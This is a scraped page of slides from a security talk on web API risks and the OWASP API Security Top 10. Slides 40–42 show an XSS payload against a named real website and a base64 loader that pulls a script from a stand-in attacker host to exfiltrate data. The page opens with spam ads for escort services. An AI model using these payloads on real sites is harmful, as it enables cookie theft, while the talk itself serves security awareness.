CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdfThe Ultimate Test Automation Guide_ Best Practices and Tips.pdf
The Ultimate Test Automation Guide_ Best Practices and Tips.pdf
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
How To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.jsHow To Use Server-Side Rendering with Nuxt.js
How To Use Server-Side Rendering with Nuxt.js
 
A Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docxA Secure and Reliable Document Management System is Essential.docx
A Secure and Reliable Document Management System is Essential.docx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
Reassessing the Bedrock of Clinical Function Models: An Examination of Large ...
 

Web Apps APIs' Nightmare Guide

  • 2. ● Security Researcher/Pentester ● 15+ years as a Software Developer ● Long-term OWASP Volunteer ● Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs’ Nightmare
  • 4.
  • 5.
  • 6.
  • 7. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET / Content-Type: text/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php login.php . . .
  • 8. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 9. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 10. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 11. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 12. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript php index.php login.php . . . POST /login.php Content-Type: text/html
  • 13.
  • 14. Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
  • 15. Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
  • 16. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
  • 17. Web Apps: APIs’ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
  • 18. Web Apps: APIs’ Nightmare
  • 19. Web Apps: APIs’ Nightmare
  • 20. Web Apps: APIs’ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
  • 21. Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
  • 22. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
  • 23. Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
  • 24. Web Apps: APIs’ Nightmare Modern Web Applications Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ...
  • 25. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
  • 26. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
  • 27. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
  • 28. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
  • 29. Web Apps: APIs’ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
  • 30. API API API API API API API API API API API API API Web Apps: APIs’ Nightmare API
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40. Web Apps: APIs’ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=alert(document.cookie)>
  • 41. Web Apps: APIs’ Nightmare Loader Payload Cross-Site Scripting
  • 42. Web Apps: APIs’ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))> Payload Cross-Site Scripting
  • 43. Web Apps: APIs’ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
  • 44.
  • 45.
  • 46. Web Apps: APIs’ Nightmare OWASP Resources Other References ● OWASP API Security Project ● OWASP API Security Top 10 2023 ● OWASP API Security Top 10 2019 ● Goats ● OWASP Vulnerable Web Applications Directory ● OWASP crAPI - Completely Ridiculous API ● OWASP Juice Shop ● OWASP Cheat Sheets Series ● Authentication Cheat Sheet ● Authorization Cheat Sheet ● GraphQL Cheat Sheet ● REST Security Cheat Sheet ● Web Service Security Cheat Sheet ● OWASP Secure Coding Practices-Quick Reference Guide ● OWASP Go Secure Coding Practices Guide ● HTTP ● Basic of HTTP - mdn web docs ● Cross-Origin Resource Sharing (CORS) - mdn web docs ● API Protocols ● REST ● Representational state transfer - Wikipedia ● Representational State Transfer (REST) - Fielding Dissertation ● RPC ● Remote procedure call - Wikipedia ● OpenRPC ● JSON-RPC ● XML-RPC ● gRPC ● GraphQL ● Introduction to GraphQL ● GraphQL blogposts Series - Checkmarx ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify ● MindAPI ● MindAPI References
  • 47. Web Apps: APIs’ Nightmare OWASP Resources Other References